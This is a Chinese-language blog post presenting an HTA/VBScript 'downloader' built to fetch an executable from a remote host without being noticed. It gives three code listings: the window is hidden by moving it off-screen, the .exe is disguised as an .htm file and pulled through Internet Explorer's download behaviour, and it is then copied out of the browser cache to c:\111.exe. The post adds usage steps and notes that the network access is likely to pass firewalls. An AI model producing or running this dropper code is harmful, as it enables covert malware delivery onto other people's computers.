一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,另一个是用Microsoft.XMLDOM做的,参见https://www.jb51.net/article/15506.htm。这两个下载者一个是利用起来比较麻烦,需要事先把exe进行转化。第二使用中cscript.exe会访问网络,不太隐蔽。第二个是有的机器上并不存在这两个组件及利用到ADODB.Stream的,所以有些弊端。 二、再来说一下lake2的下载者http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx。这个下载者算是不错了,但是也有问题。一个是如果装了360等其它的浏览器的话,会打开一个ie窗口,并且从注册表中读到的ie缓存位置不一定准确。 三、那我们如何来更新这些缺陷?还是有办法的。我们用hta来写,这个就比较少见了.hh.exe访问网络一般估计会放行的。写这个下载者要解决的困难有几下几点: (1).使hta不可见————-》简单,移动窗口 (2).使hta接收命令行参数————–》本blog上有资料 (3).不调用上边一、二大项所说的所有组件———–》这个我们利用ie的默认行为 (4).ie缓存的临时位置———》我用的环境变量 (5)我们不调用任何组件——————-》需要手动 四、代码(直接把参数写在hta里) 复制代码 代码如下: <script language=vbs> window.moveTo 4000,4000 window.resizeTo 0,0 \’使hta不可见 set objshell= Createobject(\”WScript.Shell\”)\’hta是可以直接调用WScript.Shell的,不过不能调用wscript.Createobject(\”WScript.Shell\”) downpath=objshell.ExpandEnvironmentStrings(\”%USERPROFILE%\”)&\”\\Local Settings\” \’根据环境变量得到下载的路径 set xml=document.createElement(\”xml\”)\’建方xml元素调用ie的默认行为 xml.addBehavior(\”#default#DownLoad\”) xml.async=0 xml.load(\”http://192.168.0.10/xx.htm\”)\’请把exe改名放到空间上,用ftp软件上传的话,可能不行,直接放比较好 ShowAllFile(downpath) Sub ShowAllFile(Path) \’遍历查找,直接用lake2的代码 FindFileName=\”xx[1].htm\” \’这个也是你需要改的,如果上边是xx.htm,这里就是xx[1].htm Set FSO = CreateObject(\”Scripting.FileSystemObject\”) Set f = FSO.GetFolder(Path) Set fc = f.SubFolders For Each f1 in fc If FSO.FileExists(path&\”\\\”&f1.name&\”\\\”&FindFileName) Then FSO.CopyFile path&\”\\\”&f1.name&\”\\\”&FindFileName, \”c:\\111.exe\” \’保存到c:\\111.exe,可根据需要改动 \’document.write \”[+]Download Success !\” End If ShowAllFile path&\”\\\”&f1.name Next Set FSO = Nothing End Sub window.close </script> 用法是:把exe好比xx.exe改名放到空间上,然后命令行下或双击这个hta就可以了。 五、另一份代码(传命令行参数) 我个人觉得第四部份的代码比较好,修改一下用就可以了。如果调用命令行参数的话,我发现还是会出现hta小窗口,下载完后才关闭,所以这不太好。代码: 复制代码 代码如下: <HTA:APPLICATION ID=\”MySampleHTA\” Caption=\”yes\”> <script language=vbs> on error resume Next window.moveTo 4000,4000 window.resizeTo 0,0 \’使hta不可见 cmdLineArray = Split(MySampleHTA.commandLine)\’这是把命令中的参数变成数组 set objshell= Createobject(\”WScript.Shell\”) downpath=objshell.ExpandEnvironmentStrings(\”%USERPROFILE%\”)&\”\\Local Settings\” \’根据环境变量得到下载的路径 temp=LastOne(cmdLineArray(UBound(cmdLineArray)),\”/\”) \’从命令行得到当前文件名 temp=split(temp,\”.\”)\’根据.分割 FindFileName=temp(0)&\”[1].\”&temp(1) LocalName=objshell.CurrentDirectory&\”\\\”&temp(0)&\”.exe\” set xml=document.createElement(\”xml\”) xml.addBehavior(\”#default#DownLoad\”) xml.async=0 xml.load(cmdLineArray(UBound(cmdLineArray))) ShowAllFile(downpath) Sub ShowAllFile(Path) Set FSO = CreateObject(\”Scripting.FileSystemObject\”) Set f = FSO.GetFolder(Path) Set fc = f.SubFolders For Each f1 in fc If FSO.FileExists(path&\”\\\”&f1.name&\”\\\”&FindFileName) Then FSO.CopyFile path&\”\\\”&f1.name&\”\\\”&FindFileName, LocalName \’document.write \”[+]Download Success !\” End If ShowAllFile path&\”\\\”&f1.name Next Set FSO = Nothing End Sub Function LastOne(Str,splitStr) \’输入字符和分隔符,得到最后一部分 LastOne = right(Str,len(Str)-InStrRev(Str,splitStr)) End Function window.close </script> 用法是:把exe好比xx.exe改名xx.htm放到空间上,然后命令行下好比\”c:\\xx.hta http://www.target.com/xx.htm\”,这样xx.exe就会保存到c: 六、不调用任何组件(需手动查找下载的xx[1].htm): 复制代码 代码如下: window.moveTo 4000,4000 window.resizeTo 0,0 \’使hta不可见 set xml=document.createElement(\”xml\”)\’建方xml元素调用ie的默认行为 xml.addBehavior(\”#default#DownLoad\”) xml.async=0 xml.load(\”http://192.168.0.10/xx.htm\”)\’ window.close 七、缺点 我这个hta下载者并不是完美的。第一是因为下载到的临时变量我用到了ExpandEnvironmentStrings(\”%USERPROFILE%\”),这样在用户环境下可用,如果是system权限下可能不正常(我猜测的,并没有测试)。第二是因为下载成功后并没有提示,直接用hta在命令行下显示出回显有些麻烦,所以我没有做,嘿嘿。
